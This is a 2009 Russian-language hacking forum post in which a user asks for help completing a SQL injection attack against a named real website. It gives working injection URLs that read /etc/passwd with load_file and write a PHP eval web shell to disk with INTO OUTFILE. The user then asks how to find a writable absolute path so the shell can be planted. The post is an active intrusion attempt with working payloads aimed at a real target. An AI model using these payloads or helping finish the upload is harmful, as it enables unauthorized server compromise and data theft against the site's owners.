Не получается залить/найти абсолютный путь |
13.11.2009, 18:55
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 26
С нами:
9034600
Репутация:
0
|
|
Не получается залить/найти абсолютный путь
Привет
вот вроде как уязвимость
http://www.spacefoundation.org/news/story.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,load_file('/etc/passwd') from+mysql.user--+
проверка на заливку
http://www.spacefoundation.org/news/story.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,'<?php eval($_GET[‘e’]) ?>' from+mysql.user INTO OUTFILE '/tmp/aaaaaaaaa11231.php'--+
-все записывается в папку /tmp/ , так же если захожу в /etc/passwd отображается список админов + вроде абсолютные пути к сайтам ..,но !или нет прав записи или же абсолютный путь не правильный - это если заливать по пути который указан для админа по /home/virtual/site3/fst/home/spacefoundation в /etc/passwd 
И еще когда читаю файл из tmp то запись там вида -
1,2,3,4,5,6,7,8,9,10+<?php eval($_GET[‘e’]) ?> находится в сорсе ,...+ проверял на ошибки чтоб выдавал путь - без толку. в кеше гугла ошибок нет..
проверял на наличие стандартных папок по этим шаблонам - http://forum.antichat.ru/threadnav30632-1-10.html -тоже ничего не обнаружил ...очень конечно привлекло внимание расписанный /etc/passwd .. Есть мысли ?
Последний раз редактировалось apekoff; 13.11.2009 в 19:06..
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Древовидный вид